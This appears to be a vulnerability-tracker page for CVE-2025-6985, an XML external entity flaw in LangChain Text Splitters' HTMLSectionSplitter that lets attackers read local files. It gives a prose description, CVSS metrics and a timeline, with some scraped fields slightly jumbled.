XML External Entity Vulnerability in LangChain Text Splitters by LangChain
CVE-2025-6985

7.5HIGH

Key Information:

Vendor: Langchain-ai
Status: Langchain-ai/langchain
Vendor: CVE Published:; 6 October 2025

🔔 Create Langchain-ai Vulnerability Alert

What is CVE-2025-6985?

The HTMLSectionSplitter class in LangChain Text Splitters version 0.3.8 is susceptible to XML External Entity (XXE) attacks due to vulnerable XSLT parsing practices. By allowing arbitrary XSLT stylesheets to be processed without appropriate safeguards, this vulnerability can be exploited by attackers to access sensitive files, including SSH keys and environment files, from the LangChain process. The issue stems from the fact that in certain versions of the lxml library, external entities are resolved by default. Even in later versions, where entity expansion is turned off, the XSLT document() function remains exploitable if not properly controlled. Attackers do not require authentication, special privileges, or user interaction to carry out these exploits, making the vulnerability particularly concerning for default installations that permit custom XSLT.

Affected Version(s)

langchain-ai/langchain <= unspecified

References

https://huntr.com/bounties/cf78abbb-df3b-43de-b6ee-132b73...

CVSS V3.0

Score:

7.5

Severity:

HIGH

Confidentiality:

High

Integrity:

None

Availability:

High

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

None

User Interaction:

None

Scope:

Unchanged

Download the Critical Vulnerability Management Cheat Sheet

Timeline

Vulnerability published
Oct 6, 2025
Vulnerability Reserved
Jul 1, 2025

JSON